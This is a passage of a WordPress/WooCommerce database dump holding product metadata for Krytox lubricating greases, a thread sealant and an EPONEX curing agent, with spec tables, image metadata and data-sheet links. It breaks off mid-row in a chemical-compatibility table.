INSERT INTO `wp_postmeta` VALUES (10182, 977, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (10183, 977, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10184, 977, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (10185, 977, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10186, 977, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10187, 977, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (10188, 977, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10189, 977, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10190, 977, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (10191, 977, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10192, 977, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10193, 977, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (10194, 977, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (10195, 977, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (10196, 979, '_edit_lock', '1472498639:3'); 
INSERT INTO `wp_postmeta` VALUES (10197, 980, '_wp_attached_file', '2016/08/C10684_Krytox_FPG_028-002.pdf'); 
INSERT INTO `wp_postmeta` VALUES (10198, 981, '_wp_attached_file', '2016/08/C10685_Krytox_FPG_182-002.pdf'); 
INSERT INTO `wp_postmeta` VALUES (10199, 982, '_wp_attached_file', '2016/08/C-10685_Krytox_FPG_182-Group-062716.jpg'); 
INSERT INTO `wp_postmeta` VALUES (10200, 982, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1500;s:6:"height";i:1500;s:4:"file";s:47:"2016/08/C-10685_Krytox_FPG_182-Group-062716.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:47:"C-10685_Krytox_FPG_182-Group-062716-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:47:"C-10685_Krytox_FPG_182-Group-062716-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:47:"C-10685_Krytox_FPG_182-Group-062716-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:47:"C-10685_Krytox_FPG_182-Group-062716-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:47:"C-10685_Krytox_FPG_182-Group-062716-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:47:"C-10685_Krytox_FPG_182-Group-062716-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:47:"C-10685_Krytox_FPG_182-Group-062716-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (10201, 983, '_wp_attached_file', '2016/08/Chemours-Krytox-Grease-30-g-Syringe-Horz-300-dpi-002.jpg'); 
INSERT INTO `wp_postmeta` VALUES (10202, 983, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1500;s:6:"height";i:1500;s:4:"file";s:64:"2016/08/Chemours-Krytox-Grease-30-g-Syringe-Horz-300-dpi-002.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:64:"Chemours-Krytox-Grease-30-g-Syringe-Horz-300-dpi-002-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:64:"Chemours-Krytox-Grease-30-g-Syringe-Horz-300-dpi-002-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:64:"Chemours-Krytox-Grease-30-g-Syringe-Horz-300-dpi-002-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:64:"Chemours-Krytox-Grease-30-g-Syringe-Horz-300-dpi-002-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:64:"Chemours-Krytox-Grease-30-g-Syringe-Horz-300-dpi-002-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:64:"Chemours-Krytox-Grease-30-g-Syringe-Horz-300-dpi-002-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:64:"Chemours-Krytox-Grease-30-g-Syringe-Horz-300-dpi-002-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (10203, 973, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (10204, 973, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (10205, 973, '312_default_editor', '<table width="426">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="202"></td>\r\n<td style="text-align: center;" width="224"><strong>FPG 182</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Base Oil Viscosity, cSt</strong></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">138</td>\r\n</tr>\r\n<tr>\r\n<td>100°C</td>\r\n<td style="text-align: center;">37.57</td>\r\n</tr>\r\n<tr>\r\n<td>-54°C</td>\r\n<td style="text-align: center;">9256</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Viscosity Index</strong></td>\r\n<td style="text-align: center;">313</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Pour Point</strong></td>\r\n<td style="text-align: center;">-72°C</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10206, 973, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Gears</li>\r\n 	<li>O-Rings</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10207, 973, '719_default_editor', '<ul>\r\n 	<li>D217</li>\r\n 	<li>FTM 3005</li>\r\n 	<li>FTM 5309</li>\r\n 	<li>ASTM D6184</li>\r\n 	<li>ASTM D1743</li>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D2596</li>\r\n 	<li>ASTM E595</li>\r\n 	<li>ASTM D1478</li>\r\n 	<li>ASTM D2512</li>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D3336</li>\r\n 	<li>ASTM D5707</li>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D2270</li>\r\n 	<li>ASTM D97</li>\r\n 	<li>ASTM D2714 (mod)</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10208, 973, '318_custom_list_file', 'a:1:{s:32:"de776ebc0d0c9384d828a99ae54eda3d";a:3:{s:4:"name";s:7:"FPG PDF";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/C10685_Krytox_FPG_182-002.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (10209, 973, '317_default_editor', '<table width="667">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="202"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="224"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="241"><strong>Cartridge</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">50g</td>\r\n<td style="text-align: center;">8 oz.</td>\r\n<td style="text-align: center;">1.76 lb</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">100g</td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10210, 973, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (10211, 973, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (10212, 973, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10213, 973, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10214, 973, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (10215, 973, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10216, 973, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (10217, 973, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (10218, 973, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (10219, 973, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (10220, 973, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (10221, 973, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10222, 973, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10223, 973, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10224, 973, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (10225, 973, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (10226, 973, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10227, 973, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (10228, 973, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10229, 973, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10230, 973, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (10231, 973, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10232, 973, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10233, 973, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (10234, 973, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10235, 973, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10236, 973, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (10237, 973, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (10238, 973, '_product_image_gallery', '982,380,377'); 
INSERT INTO `wp_postmeta` VALUES (10239, 984, '_edit_lock', '1478791995:2'); 
INSERT INTO `wp_postmeta` VALUES (10240, 984, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (10242, 984, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (10243, 984, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (10244, 984, '312_default_editor', '<table width="426">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="202"></td>\r\n<td style="text-align: center;" width="224"><strong>FPG 028</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Base Oil Viscosity, cSt</strong></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">50.45</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Pour Point</strong></td>\r\n<td style="text-align: center;">-69°C</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10245, 984, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Gears</li>\r\n 	<li>O-Rings</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10246, 984, '719_default_editor', '<ul>\r\n 	<li>MIL-PRF-27617 G Type IV Approval No. AFPET/PTPT 12-003</li>\r\n 	<li>FTMS 5309</li>\r\n 	<li>FTMS 5414</li>\r\n 	<li>FTMS 3005</li>\r\n 	<li>ASTM D1403</li>\r\n 	<li>ASTM D3336</li>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D6184</li>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D2596</li>\r\n 	<li>ASTM D2512</li>\r\n 	<li>ASTM D1478</li>\r\n 	<li>PRF 27617, 4.4.4</li>\r\n 	<li>ASTM D97</li>\r\n 	<li>ASTM D1264</li>\r\n 	<li>ASTM D445</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10247, 984, '318_custom_list_file', 'a:1:{s:32:"d184e4c55c6c8973c14841e6d1d82557";a:3:{s:4:"name";s:11:"FPG 028 PDF";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/C10684_Krytox_FPG_028-002.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (10248, 984, '317_default_editor', '<table width="667">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="202"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="224"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="241"><strong>Cartridge</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">50g</td>\r\n<td style="text-align: center;">8 oz.</td>\r\n<td style="text-align: center;">1.76 lb</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">100g</td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10249, 984, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (10250, 984, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10251, 984, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10252, 984, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (10253, 984, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10254, 984, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (10255, 984, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (10256, 984, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (10257, 984, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (10258, 984, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10259, 984, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10260, 984, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10261, 984, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (10262, 984, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (10263, 984, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10264, 984, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (10265, 984, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10266, 984, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10267, 984, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (10268, 984, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10269, 984, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10270, 984, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (10271, 984, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10272, 984, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10273, 984, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (10274, 984, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (10275, 984, '_product_image_gallery', '982,380,377'); 
INSERT INTO `wp_postmeta` VALUES (10302, 984, '_thumbnail_id', '1965'); 
INSERT INTO `wp_postmeta` VALUES (10303, 984, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (10304, 984, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (10305, 984, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (10306, 979, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (10307, 985, '_wp_attached_file', '2016/08/krytox-fpg-grease.jpg'); 
INSERT INTO `wp_postmeta` VALUES (10308, 985, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4726;s:6:"height";i:2984;s:4:"file";s:29:"2016/08/krytox-fpg-grease.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:29:"krytox-fpg-grease-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:29:"krytox-fpg-grease-800x505.jpg";s:5:"width";i:800;s:6:"height";i:505;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"krytox-fpg-grease-768x485.jpg";s:5:"width";i:768;s:6:"height";i:485;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:31:"krytox-fpg-grease-1600x1010.jpg";s:5:"width";i:1600;s:6:"height";i:1010;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:29:"krytox-fpg-grease-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:29:"krytox-fpg-grease-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:29:"krytox-fpg-grease-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:29:"krytox-fpg-grease-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (10309, 986, '_edit_lock', '1474471847:2'); 
INSERT INTO `wp_postmeta` VALUES (10310, 986, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (10311, 987, '_wp_attached_file', '2016/08/1510.pdf'); 
INSERT INTO `wp_postmeta` VALUES (10312, 986, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (10313, 986, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (10314, 986, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (10315, 986, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (10316, 986, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (10317, 986, '318_custom_list_file', 'a:2:{s:32:"26a5f5f9c6ee55ce7e5f79d629cf527d";a:3:{s:4:"name";s:11:"EPONEX 1510";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/1510.pdf";s:4:"desc";s:15:"EPONEX 1510 TDS";}s:32:"ff92899c6252b7533008f499204b4077";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (10318, 986, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (10319, 986, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (10320, 986, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (10321, 986, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10322, 986, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10323, 986, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (10324, 986, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10325, 986, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (10326, 986, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (10327, 986, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (10328, 986, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (10329, 986, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (10330, 986, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10331, 986, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10332, 986, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10333, 986, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (10334, 986, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (10335, 986, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10336, 986, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (10337, 986, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10338, 986, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10339, 986, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (10340, 986, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10341, 986, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10342, 986, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (10343, 986, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10344, 986, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10345, 986, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (10346, 986, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (10347, 986, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (10348, 986, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (10349, 973, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (10350, 988, '_wp_attached_file', '2016/08/krytox-thread-sealant.png'); 
INSERT INTO `wp_postmeta` VALUES (10351, 988, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:478;s:6:"height";i:437;s:4:"file";s:33:"2016/08/krytox-thread-sealant.png";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"krytox-thread-sealant-340x340.png";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:9:"image/png";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"krytox-thread-sealant-250x250.png";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:9:"image/png";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"krytox-thread-sealant-200x200.png";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:9:"image/png";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"krytox-thread-sealant-225x225.png";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:60;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (10352, 989, '_edit_lock', '1503410507:3'); 
INSERT INTO `wp_postmeta` VALUES (10353, 989, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (10354, 989, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (10355, 989, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (10356, 989, '312_default_editor', '<table width="880">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="4" width="880"><span style="font-size: 120%;"><strong>TS4 Properties</strong></span></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Temperature Range</strong></td>\r\n<td style="text-align: center;">-51-149°C</td>\r\n<td style="text-align: center;"> -65-300°F</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Compatible Chemicals</strong></td>\r\n<td style="text-align: center;">Acetone</td>\r\n<td style="text-align: center;">Heptane</td>\r\n<td style="text-align: center;">Organic Compounds</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Acrylonitrile</td>\r\n<td style="text-align: center;">Hexafluoropropylene</td>\r\n<td style="text-align: center;">Oxygen, Liquid or Gas</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Alcohol</td>\r\n<td style="text-align: center;">Hexane</td>\r\n<td style="text-align: center;">Ozone</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Acetylene</td>\r\n<td style="text-align: center;">Hydrobromic Acid</td>\r\n<td style="text-align: center;">Pentane</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;">Hydrocarbon Oils</td>\r\n<td style="text-align: center;">Hydrocarbon</td>\r\n<td style="text-align: center;">Polyalphaolefin</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;">Ammonia</td>\r\n<td style="text-align: center;">Compounds</td>\r\n<td style="text-align: center;">Potassium Chloride</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Ammonium Nitrate</td>\r\n<td style="text-align: center;">Hydrocyanic Acid</td>\r\n<td style="text-align: center;">Potassium Hydroxide</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;">Aniline</td>\r\n<td style="text-align: center;">Hydrochloric Acid</td>\r\n<td style="text-align: center;">Perchloroethylene</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Aqueous Caustic</td>\r\n<td style="text-align: center;">Hydrofluoric Acid</td>\r\n<td style="text-align: center;">Phosphoric Acids</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;">Benzene</td>\r\n<td style="text-align: center;">Hydrogen</td>\r\n<td style="text-align: center;">Phosgene</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;">Boiling Sulfuric Acid</td>\r\n<td style="text-align: center;">Hydrogen Bromide</td>\r\n<td style="text-align: center;">Polyalkylene Glycols</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Brake Fluids</td>\r\n<td style="text-align: center;">Hydrogen Chloride</td>\r\n<td style="text-align: center;">Polyalpholefins</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Bromine</td>\r\n<td style="text-align: center;">Hydrogen 